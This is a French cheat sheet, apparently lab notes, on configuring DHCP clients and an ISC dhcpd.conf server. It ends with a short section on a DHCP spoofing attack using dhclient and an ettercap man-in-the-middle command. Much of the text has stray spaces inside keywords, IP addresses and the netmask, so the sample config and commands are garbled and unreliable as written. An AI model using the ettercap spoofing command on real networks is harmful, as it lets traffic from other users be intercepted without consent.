

Configuration IP des Clients

```
Dans l'interface "network", ajouter:  
auto eth0  
iface eth0 inet dhcp  
  
ifdown eth0 && ifup eth0
```

Fichier de configuration DHCP

```
Chemin : /etc/dhcp/dhcpd.conf  
exemple :  
defaul t-l eas e-time 600;  
min-le ase -time 300;  
max-le ase -time 7200;  
subnet 192.16 8.10.0 netmask 255.25 5.255.0 {  
    range 192.16 8.1 0.100 192.16 8.1 0.150;  
    host my_server {  
        har dware ethernet a0:00: 01: 02: 03:04;  
        fix ed- address 192.16 8.1 0.200;  
    }  
    option routers 192.16 8.10.1;  
}
```

/var/lib/dhcp/dhcpd.leases contient les baux accordés

Attaque DHCP Spoofing

Relâcher la configuration réseau	dhclient -r <iface>
Démarrer l'interface en mode débug	dhclient -d <iface>
Lancer l'attaque DHCP Spoofing sur client2	ettercap -Tzq -M dhcp:/255.255.2-55.0/<IP_DHCPI>
Activer le client DHCP sur client1	dhclient eth0



By **Maxime Simorre**
(ERROMIS)
cheatography.com/erromis/

Not published yet.
Last updated 27th October, 2024.
Page 1 of 1.

Sponsored by **Readable.com**
Measure your website readability!
<https://readable.com>